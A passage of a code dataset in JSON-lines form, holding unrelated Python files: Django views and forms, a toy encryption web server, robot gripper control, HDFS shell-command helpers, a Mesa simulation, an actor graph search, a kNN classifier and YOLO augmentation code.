total=price*int(quantity)\n if int(quantity)<=int(p.ipo_Qty):\n if total<=po_bal1:\n user.po_bal=int(user.po_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save()\n counter=1\n mf_bal1=user.po_bal \n p.ipo_Qty=int(p.ipo_Qty)-int(quantity)\n p.save()\n po_bal1=user.po_bal\n \n return render_to_response('Thank1.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1})\n\ndef thank2_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n fo_list = FO.objects.all()\n for fo in fo_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = FO.objects.get(pk=mfid)\n price=int(p.fo_cost)\n total=price*int(quantity)\n if int(quantity)<=int(p.fo_Qty):\n if total<=mf_bal1:\n user.fo_bal=int(user.fo_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save() \n counter=1\n fo_bal1=user.fo_bal \n p.fo_Qty=int(p.fo_Qty)-int(quantity)\n p.save()\n \n \n return render_to_response('Thank2.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1})\n","sub_path":"financial_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524907021","text":"from django.urls import path\nfrom .views import (Poster, CreateSession, BuyTicket, CreateCinemaHall,\n CreateMovie, BasketListView, UpdateSession, DeleteSession)\n\n\nurlpatterns = [\n path('', Poster.as_view(), name='poster'),\n path('create_session/', CreateSession.as_view(), name='create_session'),\n path('update_session/', UpdateSession.as_view(), name='update_session'),\n path('delete_session/', DeleteSession.as_view(), name='delete_session'),\n path('create_cinema_hall/', CreateCinemaHall.as_view(), name='create_cinema_hall'),\n path('buy_ticket/', BuyTicket.as_view(), name='buy_ticket'),\n path('create_movie/', CreateMovie.as_view(), name='create_movie'),\n path('basket/', BasketListView.as_view(), name='basket'),\n]\n","sub_path":"cinema/cinema_box_office/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444185122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 25 13:55:35 2020\n@author: generic\n\"\"\"\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time, sys, base64, json\nfrom urllib import parse\n\nhostName = \"localhost\"\nserverPort = 8080\n\n\nclass MyServer(BaseHTTPRequestHandler):\n history = []\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n if self.getPage() == '/':\n html = open(\"encryptionBase.html\")\n htmlString = html.read()\n html.close()\n self.wfile.write(bytes(htmlString.replace(\"_PLACEHOLDER_\",\"No encryption has yet been performed\"), \"utf-8\"))\n\n if self.getPage() == \"/encrypt\":\n params = self.getParams()\n encryptedText = self.encode(params['key'], params['plainText'])\n self.wfile.write(encryptedText)\n self.history.append(encryptedText.decode(\"utf-8\"))\n\n if self.getPage() == \"/decrypt\":\n params = self.getParams()\n decryptedText = self.decode(params['key'], params['cipherText'])\n self.wfile.write(bytes(decryptedText, \"utf-8\"))\n\n if self.getPage() == \"/history\":\n json.dumps(self.history)\n self.wfile.write(bytes(json.dumps(self.history), \"utf-8\"))\n # Gets the query parameters of a request and returns them as a dictionary\n def getParams(self):\n output = {}\n queryList = parse.parse_qs(parse.urlsplit(self.path).query)\n for key in queryList:\n if len(queryList[key]) == 1:\n output[key] = queryList[key][0]\n return output\n\n # Returns a string containing the page (path) that the request was for\n def getPage(self):\n return parse.urlsplit(self.path).path\n\n def encode(self, key, plaintext):\n output = []\n for i in range(len(plaintext)):\n key_c = key[i % len(key)]\n enc_c = (ord(plaintext[i]) + ord(key_c)) % 256\n output.append(enc_c)\n return base64.urlsafe_b64encode(bytes(output))\n\n def decode(self, key, ciphertext):\n output = []\n ciphertext = base64.urlsafe_b64decode(ciphertext)\n for i in range(len(ciphertext)):\n key_c = key[i % len(key)]\n dec_c = chr((256 + ciphertext[i] - ord(key_c)) % 256)\n output.append(dec_c)\n return \"\".join(output)\n\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started at 127.0.0.1:8080\")\n\n try:\n webServer.serve_forever()\n except:\n webServer.server_close()\n print(\"Server stopped.\")\n sys.exit()\n\n webServer.server_close()\n print(\"Server stopped.\")\n sys.exit()","sub_path":"Python/pythonBase.py","file_name":"pythonBase.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634154531","text":"#****************************************************************************************\n#\n# Author : Aniruddha Shembekar, University of Southern California\n#\n#****************************************************************************************\n\nimport serial \nimport time\nimport sys\nimport gripper_comm\nimport arduino_comm\n\n# to give admin access to usb ports - \n# sudo chmod 666 /dev/ttyACM0\n# sudo chmod 666 /dev/ttyUSB1\n# sudo chmod 666 /dev/ttyUSB3\n\nconnect_arduino = False\n\nclass GripperState():\n\tdef __init__(self,arduino_comm_num=0,gripper1_comm_num=3,gripper2_comm_num=1):\n\t\tself.time_gap_valve_and_gripper = 0.1\n\t\tif connect_arduino:\n\t\t\t# arduino object\n\t\t\tself.objarduino=arduino_comm.CommModule(arduino_comm_num)\n\t\t\tself.objarduino.arduinocomm()\n\t\t# gripper 1 object\n\t\tprint(\"gripper1_comm_num :\" + str(gripper1_comm_num))\n\t\tself.objgripper1=gripper_comm.GripperIO(gripper1_comm_num)\n\t\tself.objgripper1.set_speed(255)\n\t\tself.objgripper1.set_force(0)\n\t\t# gripper 2 object\n\t\tprint(\"gripper2_comm_num :\"+str(gripper2_comm_num))\n\t\tself.objgripper2=gripper_comm.GripperIO(gripper2_comm_num)\n\t\tself.objgripper2.set_speed(255)\n\t\tself.objgripper2.set_force(0)\n\t\tself.open_pos_g1 = 170\n\t\tself.open_pos_g2 = 170\n\t\tself.close_pos_g1 = 255\n\t\tself.close_pos_g2 = 255\n\n\tdef activate_grippers(self):\n\t\ttry:\n\t\t\tself.objgripper1.activate()\n\t\texcept:\n\t\t\tprint(\"gripper 1 could not be activated\")\n\t\ttry:\n\t\t\tself.objgripper2.activate()\n\t\texcept:\n\t\t\tprint(\"gripper 2 could not be activated\")\n\n\tdef set_open_pos(self,gripper_num,val):\n\t\tif (gripper_num==1):\n\t\t\tself.open_pos_g1 = val\n\t\tif (gripper_num==2):\n\t\t\tself.open_pos_g2 = val\n\n\tdef set_close_pos(self,gripper_num,val):\n\t\tif (gripper_num==1):\n\t\t\tself.close_pos_g1 = val\t\n\t\tif (gripper_num==2):\n\t\t\tself.close_pos_g2 = val\t\n\n\tdef valve_open(self,valve1,valve2):\n\t\tself.objarduino.valve_open(valve1)\n\t\ttime.sleep(2*self.time_gap_valve_and_gripper)\n\t\tself.objarduino.valve_open(valve2)\n\t\ttime.sleep(self.time_gap_valve_and_gripper) \n\t\t\t\n\tdef valve_close(self,valve1,valve2):\n\t\ttime.sleep(0.1)\n\t\tself.objarduino.valve_close(valve1)\n\t\tself.objarduino.valve_close(valve2)\n\t\ttime.sleep(self.time_gap_valve_and_gripper)\n\n\tdef open(self,gripper_num):\n\t\tif (gripper_num==1):\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_open(1,2)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\tself.objgripper1.go_to(self.open_pos_g1)\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_close(1,2)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\n\t\tif (gripper_num==2):\n\t\t\t# print(\"reached here from gripper state code\")\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_open(3,4)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\tself.objgripper2.go_to(self.open_pos_g2)\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_close(3,4)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\t\n\tdef close(self,gripper_num):\n\t\tif (gripper_num==1):\n\t\t self.objgripper1.go_to(self.close_pos_g1)\n\t\tif (gripper_num==2):\n\t\t\tself.objgripper2.go_to(self.close_pos_g2)\n\t\t \n","sub_path":"robots_server/scripts/gripper_state.py","file_name":"gripper_state.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313221387","text":"#####################################\n# if bresenham is not installed yet:\n#import pip\n#pip.main(['install', 'bresenham'])\n#####################################\n\nfrom mesa.visualization.modules import CanvasGrid\nfrom mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.modules import ChartModule\n\n# Import the implemented classes\nimport IPython\nimport os\nimport sys\n\n# Change stdout so we can ignore most prints etc.\norig_stdout = sys.stdout\n\nsys.stdout = open(os.devnull, 'w')\n\nIPython.get_ipython().magic(\"run amongus_model.ipynb\")\nsys.stdout = orig_stdout\n\n# You can change this to whatever you want. Make sure to make the different types\n# of agents distinguishable\ndef agent_portrayal(agent):\n if type(agent) == Crewmate:\n portrayal = {\"Shape\": \"images\\crewmate.png\",\n \"Layer\": 1,\n \"scale\": 7}\n elif type(agent) == Imposter:\n portrayal = {\"Shape\": \"images\\imposter.png\",\n \"Layer\": 1,\n \"scale\": 7}\n elif type(agent) == Wall:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"black\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"w\": 1,\n \"h\": 1}\n elif type(agent) == Obstruction:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"gray\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"w\": 1,\n \"h\": 1}\n elif type(agent) == Vent:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"green\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"scale\": 4,\n \"w\": 1,\n \"h\": 1}\n \n elif type(agent) == ShortTask:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"pink\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"scale\": 2,\n \"w\": 1,\n \"h\": 1}\n \n return portrayal\n\n# Create a grid of 114 by 114 cells, and display it as 570 by 570 pixels\n# grid = CanvasGrid(agent_portrayal, 114, 114, 570, 570)\ngrid = CanvasGrid(agent_portrayal, 242, 138, 1210, 690)\n\n# Create the server, and pass the grid and the graph\nserver = ModularServer(AmongUs,\n [grid],\n \"AmongUs\", \n {'map_name': 'the_skeld', \n 'n_crew': 3,\n 'n_impo': 1})\n\nserver.port = 8523\n\nserver.launch()\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333134165","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport traceback\nimport sys\nimport os\nimport time\nimport datetime\nfrom framework.log import getlogger\nimport util\nimport fileoperation\n\ndef checkOrCreatePartition(req):\n retVal,output = util.executeCMDWithTimeout(req,float(20))\n #getlogger().info(\"after exec:%s retval type:%s\",req,type(retVal))\n if retVal == 127:\n getlogger().error(\"[%s] '%s' exc result:%s, hadoop client no install\",os.path.basename(__file__),req,retVal)\n return False\n if retVal !=0 :\n getlogger().warning(\"%s exec result:%s\",req,str(retVal))\n return False\n return True\n\n# -1 : fault error, 1 : exist 0: not exist\ndef isDirExist(dirInfo, logger):\n check_dir_req = \"hadoop fs -test -e %s\" %(dirInfo)\n retval,output = util.executeCMD3(check_dir_req)\n if retval == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\",os.path.basename(__file__),check_dir_req,retval)\n return -1\n if retval == 0:\n return 1\n else:\n return 0\n\ndef createDir(dirInfo, logger):\n mkdir_dir_req = \"hadoop fs -mkdir -p %s\" %(dirInfo)\n retval ,output = util.executeCMD3(mkdir_dir_req)\n if retval == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),mkdir_dir_req,retval)\n return False\n if retval !=0 :\n logger.error(\"[%s] '%s' exc failed:%s\", os.path.basename(__file__), mkdir_dir_req,retval)\n return False\n return True\n\ndef fileSiz(dirInfo):\n file_size_req = \"hadoop fs -du %s |awk '{print $1}' \" % (dirInfo)\n retval,sizeInfo = util.executeCMD3(file_size_req)\n if sizeInfo is None :\n getlogger().warning(\"[%s] %s exc failed for:%s\",os.path.basename(__file__),file_size_req,util.getExceptInfo())\n return 0\n return int(sizeInfo)\n\ndef renameFile(oldFilename, newFilename, logger):\n req = \"hadoop fs -mv %s %s\" % (oldFilename,newFilename)\n retVal,output= util.executeCMD3(req)\n if retVal == 127:\n getlogger().error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n getlogger().warning(\"[%s] '%s' exec result:%s\", os.path.basename(__file__),req, retVal)\n return False\n return True\n \ndef checkOrCreateDir(dirInfo, logger):\n return createDir(dirInfo, logger)\n\ndef fileSizCheck(dirInfo,srcSiz,retries):\n hdfsSiz = 0\n for i in range(retries):\n hdfsSiz = fileSiz(dirInfo)\n if hdfsSiz != srcSiz:\n time.sleep(0.1)\n else:\n return True,hdfsSiz\n return False,hdfsSiz\n\n\ndef removeFile(filenameWithPath, logger):\n req = \"hadoop fs -rm %s \" % (filenameWithPath)\n retVal,output= util.executeCMD3(req)\n if retVal == 127:\n logger.error(\"[%s] exe:'%s' failed result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n logger.error(\"[%s] exe:'%s' failed result:%s\",os.path.basename(__file__),req,retVal)\n return False\n return True\n\ndef moveFileToHDFS(srcDir,destDir, logger):\n req = \"hadoop fs -moveFromLocal %s %s\" % (srcDir,destDir)\n retVal,output = util.executeCMD3(req)\n if retVal == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n return False\n return True\n\ndef storeFileToHadoop(srcDir,partitionDir, logger):\n tempfile = os.path.join(partitionDir,\".\" + os.path.basename(srcDir))\n #srcSize = fileoperation.fileSize(srcDir)\n # now file not exist!\n if not moveFileToHDFS(srcDir,tempfile, None):\n # maybe partition not exist\n if not createDir(partitionDir, logger):\n return False\n if not moveFileToHDFS(srcDir, tempfile, logger):\n # maybe file is exist\n rcode = int(isDirExist(tempfile, logger))\n if rcode != 1:\n # file not is exist\n return False\n # remove file\n if not removeFile(tempfile, logger):\n return False\n if not moveFileToHDFS(srcDir, tempfile, logger):\n req = \"hadoop fs -moveFromLocal %s %s\" % (srcDir, tempfile)\n logger.error(\"[%s] exe:'%s' failed\", os.path.basename(__file__), req)\n return False\n # now tmpfile success\n lastFilename = os.path.join(partitionDir,os.path.basename(srcDir))\n if not renameFile(tempfile,lastFilename, logger):\n # may be file is exist\n rcode = int(isDirExist(lastFilename, logger))\n if rcode != 1:\n # file not is exist\n return False\n # remove file\n if not removeFile(lastFilename, logger):\n return False\n if not renameFile(tempfile, lastFilename, logger):\n return False\n return True","sub_path":"loadhdfs/utils/hdfsOperation.py","file_name":"hdfsOperation.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349722104","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom register.models import Student, Parent\nfrom .models import Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass UserTeacherRegisterForm(UserCreationForm):\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']\n labels = {\n 'username': 'login',\n 'first_name': 'imię',\n 'last_name': 'nazwisko',\n 'email': 'email',\n }\n help_texts = {\n 'username': 'Podaj nazwę użytkownika',\n 'first_name': 'Podaj imię użytkownika',\n 'last_name': 'Podaj nazwisko użytkownika',\n 'email': 'Podaj email użytkownika',\n }\n\n\nclass ParentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = Parent\n fields = ['students']\n\n def __init__(self, *args, **kwargs):\n super(ParentRegisterForm, self).__init__(*args, **kwargs)\n self.fields['students'].required = False\n self.fields['students'].label = 'dzieci'\n self.fields['students'].widget = forms.CheckboxSelectMultiple()\n\n\nclass UserUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['email']\n labels = {\n 'email': 'email'\n }\n help_texts = {\n 'email': 'Podaj nowy email',\n }\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['image', 'phone']\n labels = {\n 'image': 'zdjęcie',\n 'phone': 'telefon',\n }\n help_texts = {\n 'image': 'Podaj nowe zdjęcie',\n 'phone': 'Podaj nowy telefon',\n }\n\n\nclass UserParentStudentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name']\n labels = {\n 'first_name': 'imię',\n 'last_name': 'nazwisko',\n }\n help_texts = {\n 'first_name': 'Podaj imię użytkownika',\n 'last_name': 'Podaj nazwisko użytkownika',\n }\n\n\nclass StudentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = Student\n fields = ['year_of_birth', 'classes']\n labels = {\n 'year_of_birth': 'rok urodzenia',\n 'classes': 'klasa',\n }\n help_texts = {\n 'year_of_birth': 'Podaj rok urodzenia użytkownika',\n }\n","sub_path":"school_reg/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569234377","text":"\"\"\"\"\nGraph search implemented to find mutual movie actors.\nThis project will help us to understand how graph search works. Movie is an edge and actor is node\n@author: Segni Habulu\n\"\"\"\n\n\nfrom Graph import Graph, Edge\nfrom Queue import Queue as Queue\nfrom Node import Node\nimport time\n\n\n# we will use the following list to reset later\n\nvisited_movie = []\nvisited_actor = []\n\n\ndef load_graph(graph, file_path):\n file = open(file_path, mode=\"r\", encoding=\"utf-8\")\n for line in file.readlines():\n line = line.strip().split('/')\n movie, casts = Edge(line[0]), line[1:]\n\n # using list comprehension we add to our list and dictionary\n node_list = [Node(cast) for cast in casts]\n [graph.node_to_edge_dictionary(node, movie) for node in node_list]\n\n if movie.title not in graph.edgeToNode.keys():\n graph.edgeToNode[movie.title] = node_list\n # we will store on dictionary {movie : [nodes]}\n file.readline().strip()\n file.close()\n \n return graph\n\n\ndef distance(graph, actor1, actor2):\n\n if visited_movie is not None:\n [node.set_not_visited() for node in visited_actor]\n [edge.set_not_visited() for edge in visited_movie]\n visited_movie.clear()\n visited_actor.clear()\n\n first_node = Node(actor1)\n current_que, next_que = Queue(), Queue()\n if actor1 == actor2:\n return print(\"The distance is \", 0)\n\n _distance = 1\n current_que.enqueue(first_node)\n while not current_que.is_empty():\n cast = current_que.deque()\n if cast.name in graph.nodeToEdge.keys():\n movies = graph.nodeToEdge[cast.name]\n\n try: \n for movie in movies:\n if not movie.is_visited():\n actors = graph.edgeToNode[movie.title]\n for actor in actors:\n if not actor.is_visited():\n if actor.name == actor2:\n return print(\"minimum distance between \", actor1, \" and \", actor2, \" is \", _distance)\n actor.set_visited()\n visited_actor.append(actor)\n next_que.enqueue(actor)\n movie.set_visited()\n visited_movie.append(movie)\n except UnboundLocalError:\n return print(None)\n \n if current_que.is_empty():\n if not next_que.is_empty():\n current_que = next_que\n next_que = Queue()\n _distance += 1\n else:\n return print(\"No edge exists between nodes.\")\n\n\ndef __test__():\n start = time.time()\n graph = Graph()\n graph = load_graph(graph, \"cast.txt\")\n distance(graph, \"Knuppe, Kerry\", \"Doyle, Norman\")\n stop = time.time()\n print(stop - start, \"seconds\")\n\n start = time.time()\n distance(graph, \"Knuppe, Kerry\", \"Doyle, Norman\")\n stop = time.time()\n print(stop - start, \"seconds\")\n\n\n__test__()\n\n\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"274692110","text":"import torch\nimport os\nimport pandas as pd\nimport time\nfrom statistics import mode\nfrom scipy import stats as s\nfrom scipy.spatial.distance import cdist\n# from sklearn.neighbors import LocalOutlierFactor\n# from sklearn import svm\n\n\nclass knn_torch:\n def __init__(self, datafile=None, savefile=None, knn_size=10):\n\n self.knn_size = knn_size\n self.x_data = None\n self.y_data = None\n self.save_file = datafile if not savefile else savefile\n self.classes = None\n\n # self.outlier_estimator = LocalOutlierFactor(metric='minkowski', novelty=True)\n # self.outlier_estimator = svm.OneClassSVM(nu=0.1, kernel=\"rbf\", gamma=0.1)\n\n if datafile:\n print(f'loading data from file: {datafile}')\n if (os.path.exists(datafile)):\n print('File found')\n data = torch.load(datafile)\n self.x_data = data['x']\n self.y_data = data['y']\n print(\n f'Found {self.x_data.shape[0]} points with {len(set(self.y_data))} classes')\n print(pd.Series(self.y_data).value_counts())\n self.classes = list(set(self.y_data))\n\n if torch.cuda.is_available():\n self.x_data = self.x_data.cuda()\n\n # self.outlier_estimator.fit(self.x_data.cpu())\n else:\n print('File not found')\n\n\n\n def add_points(self, x, y):\n\n # print(x.shape, len(y))\n if self.x_data == None:\n self.x_data = x\n self.y_data = y\n else:\n self.x_data = torch.cat([self.x_data, x])\n self.y_data = self.y_data + y\n self.classes = list(set(self.y_data))\n\n torch.save({'x': self.x_data.detach().cpu(),\n 'y': self.y_data}, self.save_file)\n\n # self.outlier_estimator.fit(self.x_data.cpu())\n\n\n def remove_class(self, cl):\n inds_to_keep = [idx for idx, el in enumerate(self.y_data) if el != cl]\n\n self.x_data = self.x_data[inds_to_keep]\n self.y_data = [self.y_data[i] for i in inds_to_keep]\n\n self.classes = list(set(self.y_data))\n\n torch.save({'x': self.x_data.detach().cpu(),\n 'y': self.y_data}, self.save_file)\n\n\n def classify(self, x):\n\n if self.x_data is None:\n print('No trained classes found')\n return None\n\n\n if len(x.shape) == 1:\n x = x.unsqueeze(0)\n\n clss = []\n confs = []\n min_dists = []\n for x_el in x:\n\n\n x_el = x_el.unsqueeze(0)\n dist = cdist(x_el.cpu(), self.x_data.cpu(), metric='cosine').squeeze()\n dist = torch.Tensor(dist)\n\n # dist = torch.norm(self.x_data - x_el, dim=1, p=None)\n\n # print(dist.min(), dist.max())\n\n\n knn = dist.topk(self.knn_size, largest=False)\n\n\n near_y = list(map(self.y_data.__getitem__, knn.indices))\n cl = s.mode(near_y)[0]\n\n\n frac = near_y.count(cl) / self.knn_size\n\n clss.append(cl[0])\n confs.append(frac)\n\n # print(self.outlier_estimator.n_samples_fit_, self.outlier_estimator.n_features_in_)\n\n # smallest_dist = self.outlier_estimator.predict(x_el.cpu())[0]\n # print(smallest_dist)\n\n # smallest_dist = dist[knn.indices[0]]\n # print(dist.min(), dist.max())\n # avg_dist = dist[knn.indices].max()\n min_dists.append(dist.min())\n\n\n return clss, confs, min_dists\n","sub_path":"scripts/models/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466059197","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\nimport tensorflow_addons as tfa\nfrom tensorflow_addons.image import utils as img_utils\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport time\nimport tensorflow.keras.backend as K\n\n# Global Variable to introduce randomness among each element of a batch\nRANDOM_SEED = tf.random.Generator.from_seed(\n int(np.random.uniform(low=300, high=9000)))\n\n\ndef image_scaler(image):\n \"\"\"Image Normalization.\n Args:\n image(tensorflow.python.framework.ops.Tensor): The image.\n Returns:\n A Normalized Function.\n \"\"\"\n image = tf.convert_to_tensor(image)\n image = image / 255\n return image\n\n\ndef py_func_rand():\n \"\"\"Image Normalization.\n Returns:\n jitter(tensorflow.python.framework.ops.Tensor): A random number generated\n from a uniform distrubution between -0.3 and 0.3.\n randscale(tensorflow.python.framework.ops.Tensor): A random integer between\n -10 and 19.\n \"\"\"\n randscale = np.random.randint(low=10, high=19)\n jitter_x = np.random.uniform(low=-0.1, high=0.1)\n jitter_y = np.random.uniform(low=-0.1, high=0.1)\n jitter_cx = 0.0\n jitter_cy = 0.0\n jitter_bw = np.random.uniform(low=-.05, high=.05) + 1.0\n jitter_bh = np.random.uniform(low=-.05, high=.05) + 1.0\n return jitter_x, jitter_y, jitter_cx, jitter_cy, jitter_bw, jitter_bh, randscale\n\n\n@tf.function\ndef build_grided_gt(y_true, mask, size):\n \"\"\"\n convert ground truth for use in loss functions\n Args: \n y_true: tf.Tensor[] ground truth [box coords[0:4], classes_onehot[0:-1], best_fit_anchor_box]\n mask: list of the anchor boxes choresponding to the output, ex. [1, 2, 3] tells this layer to predict only the first 3 anchors in the total. \n size: the dimensions of this output, for regular, it progresses from 13, to 26, to 52\n \n Return:\n tf.Tensor[] of shape [batch, size, size, #of_anchors, 4, 1, num_classes]\n \"\"\"\n batches = tf.shape(y_true)[0]\n num_boxes = tf.shape(y_true)[1]\n len_masks = tf.shape(mask)[0]\n\n # finshape = tf.convert_to_tensor([batches, size, size, len_masks * tf.shape(y_true)[-1]])\n full = tf.zeros([batches, size, size, len_masks, tf.shape(y_true)[-1]])\n depth_track = tf.zeros((batches, size, size, len_masks), dtype=tf.int32)\n\n x = tf.cast(y_true[..., 0] * tf.cast(size, dtype=tf.float32),\n dtype=tf.int32)\n y = tf.cast(y_true[..., 1] * tf.cast(size, dtype=tf.float32),\n dtype=tf.int32)\n\n anchors = tf.repeat(tf.expand_dims(y_true[..., -1], axis=-1),\n len_masks,\n axis=-1)\n\n update_index = tf.TensorArray(tf.int32, size=0, dynamic_size=True)\n update = tf.TensorArray(tf.float32, size=0, dynamic_size=True)\n\n i = 0\n for batch in range(batches):\n for box_id in range(num_boxes):\n if K.all(tf.math.equal(y_true[batch, box_id, 2:4], 0)):\n continue\n if K.any(tf.math.less(y_true[batch, box_id, 0:2], 0.0)) or K.any(\n tf.math.greater_equal(y_true[batch, box_id, 0:2], 1.0)):\n #tf.print(\"outer vals: \",y_true[batch, box_id, 0:2])\n continue\n index = tf.math.equal(anchors[batch, box_id], mask)\n if K.any(index):\n p = tf.cast(K.argmax(tf.cast(index, dtype=tf.int32)),\n dtype=tf.int32)\n\n # start code for tie breaker, temp check performance\n # find the index of the box\n uid = 1\n used = depth_track[batch, y[batch, box_id], x[batch, box_id],\n p]\n count = 0\n # check if the next anchor is used used == 1, if so find another box\n while tf.math.equal(used, 1) and tf.math.less(count, 3):\n uid = 2\n count += 1\n p = (p + 1) % 3\n used = depth_track[batch, x[batch, box_id], y[batch,\n box_id], p]\n if tf.math.equal(used, 1):\n tf.print(\"skipping\")\n continue\n # set the current index to used = 2, to indicate that it is occupied by something that should not be there, so if another box fits that anchor\n # it will be prioritized over the current box.\n depth_track = tf.tensor_scatter_nd_update(\n depth_track,\n [(batch, y[batch, box_id], x[batch, box_id], p)], [uid])\n #end code for tie breaker\n\n # write the box to the update list\n # the boxes output from yolo are for some reason have the x and y indexes swapped for some reason, I am not sure why\n \"\"\"peculiar\"\"\"\n update_index = update_index.write(\n i, [batch, y[batch, box_id], x[batch, box_id], p])\n value = K.concatenate([\n y_true[batch, box_id, 0:4],\n tf.convert_to_tensor([1.]), y_true[batch, box_id, 4:-1]\n ])\n update = update.write(i, value)\n i += 1\n \"\"\"\n used can be:\n 0 not used\n 1 used with the correct anchor\n 2 used with offset anchor\n if used is 0 or 2:\n do not enter tie breaker (count = 0)\n edit box index with the most recent box\n if tie breaker was used:\n set used to 2\n else:\n set used to 1\n E tensorflow/core/grappler/optimizers/dependency_optimizer.cc:741] Iteration = 0, topological sort failed with message: The graph couldn't be sorted in topological order.\n raised likely due to a memory issue? reduced batch size to 2 and it solved the problem? odd\n W tensorflow/core/grappler/optimizers/loop_optimizer.cc:906] Skipping loop optimization for Merge node with control input: cond/branch_executed/_11\n idk should look into this\n 18 seconds for 2000 images\n \"\"\"\n\n # if the seize of the update list is not 0, do an update, other wise, no boxes and pass an empty grid\n if tf.math.greater(update_index.size(), 0):\n update_index = update_index.stack()\n update = update.stack()\n full = tf.tensor_scatter_nd_add(full, update_index, update)\n return full\n\n\ndef _classification_data_augmentation(datapoint, num_of_classes):\n \"\"\"Augments image by performing Random Zoom, Resize with Pad, Random Rotate,\n Random Brightness Distortion, Random Saturation Distortion, Random Hue Distortion\n and finally normalizing the image.\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n Returns:\n Either Image and Label or Image and Object.\n \"\"\"\n # Data Augmentation values intializations.\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n w = tf.cast(tf.shape(image)[0], tf.float32)\n h = tf.cast(tf.shape(image)[1], tf.int32)\n low = tf.cast(128, tf.dtypes.float32)[None]\n high = tf.cast(448, tf.dtypes.float32)[None]\n scale = tf.py_function(_rand_number, [low, high], [tf.float32])\n aspect = tf.py_function(_rand_number, [.75, 1.25], [tf.float32])\n deg = 